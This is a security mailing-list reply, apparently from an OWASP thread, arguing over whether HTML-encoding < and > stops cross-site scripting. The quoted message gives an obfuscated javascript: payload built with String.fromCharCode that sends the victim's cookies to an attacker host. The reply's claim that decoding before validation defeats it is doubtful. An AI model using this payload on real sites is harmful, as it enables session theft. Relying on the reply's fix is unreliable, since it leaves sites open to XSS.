Re: [Re: AppSec FAQ at OWASP]

[Rohyt Belani <rohytbelani () hotmail com>]

In-Reply-To: <02ca01c3e706$59b8f720$ec658009@pprados>


> > An easier solution to prevent XSS attacks might be to HTML encode the "<"
> and ">" characters as &lt and &gt. So even if they are accepted as input
> from the user, it would not result in the execution of a script like
> &lt;script&gt;...&lt;/script&gt;.
>
>
> It's not correct. With this code :
> <a href="<%= escapeHTML(url)%>/doc.html">Document</a>
>
> The hacker can inject in the variable url the value :
> javascript:eval(String.fromCharCode(60,115,99,114,105,112,116,62,110,101,119
> ,32,73,109,97,103,101,40,41,46,115,114,99,61,34,104,116,116,112,58,47,47,112
> ,105,114,97,116,101,46,111,114,103,47,118,111,108,101,99,111,111,107,105,101
> ,46,106,115,112,63,99,61,34,43,101,115,99,97,112,101,40,100,111,99,117,109,1
> 01,110,116,46,99,111,111,107,105,101,41,59,60,47,115,99,114,105,112,116,62))
> and execute a script without <, > or &!
>
> Phil

The solution I proposed for HTML encoding characters like < and > will still be effective in the case you mentioned.
This is because the underlying principle for good input validation routines is to first decode the encoded URL and then 
perform input validation. By doing so all encoding attacks like the one you mentioned can be prevented from executing 
successfully.
>